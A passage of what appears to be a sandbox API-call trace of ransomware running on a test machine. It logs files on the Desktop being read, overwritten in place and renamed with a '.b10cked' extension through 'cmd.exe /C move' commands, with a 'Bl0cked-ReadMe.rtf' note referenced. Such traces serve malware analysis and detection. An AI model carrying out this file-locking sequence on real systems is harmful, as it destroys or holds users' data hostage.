dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xf3ec [0224.066] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0224.067] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0224.067] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.067] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8d4 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8d4 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.068] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c69, lpOverlapped=0x0) returned 1 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.068] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c69, lpOverlapped=0x0) returned 1 [0224.069] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-31849, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c6b [0224.069] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c69, lpOverlapped=0x0) returned 1 [0224.069] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-31849, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c6b [0224.069] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c69, lpOverlapped=0x0) returned 1 [0224.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kawGr8UmxCuLrfZA.swf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kawGr8UmxCuLrfZA.swf", cchWideChar=20, lpMultiByteStr=0x13286a4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kawGr8UmxCuLrfZA.swf", lpUsedDefaultChar=0x0) returned 20 [0224.073] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8d4 [0224.073] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0224.074] CloseHandle (hObject=0x1b4) returned 1 [0224.074] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF") returned 0x25 [0224.075] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0224.075] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xd60, dwThreadId=0xcb4)) returned 1 [0224.080] CloseHandle (hObject=0x120) returned 1 [0224.080] CloseHandle (hObject=0x1b4) returned 1 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.080] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 1 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.080] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28086999215) returned 1 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa761 [0224.083] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xac49 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xac49 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.084] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5623, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5623, lpOverlapped=0x0) returned 1 [0224.085] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.085] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5623, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5623, lpOverlapped=0x0) returned 1 [0224.085] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-22051, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5626 [0224.085] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5623, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5623, lpOverlapped=0x0) returned 1 [0224.085] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-22051, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5626 [0224.085] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5623, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5623, lpOverlapped=0x0) returned 1 [0224.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="e-AggmA P_oioCEdo08.mkv", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0224.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="e-AggmA P_oioCEdo08.mkv", cchWideChar=23, lpMultiByteStr=0x13286a4, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e-AggmA P_oioCEdo08.mkv", lpUsedDefaultChar=0x0) returned 23 [0224.163] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xac49 [0224.163] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0224.163] CloseHandle (hObject=0x1b4) returned 1 [0224.164] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV") returned 0x2a [0224.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\") returned 0x1e [0224.165] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x55c, dwThreadId=0xf94)) returned 1 [0224.260] CloseHandle (hObject=0x120) returned 1 [0224.260] CloseHandle (hObject=0x1b4) returned 1 [0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\") returned 0x1e [0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.261] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 3 [0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\") returned 0x1e [0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.261] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0224.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0224.261] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0224.261] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0224.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 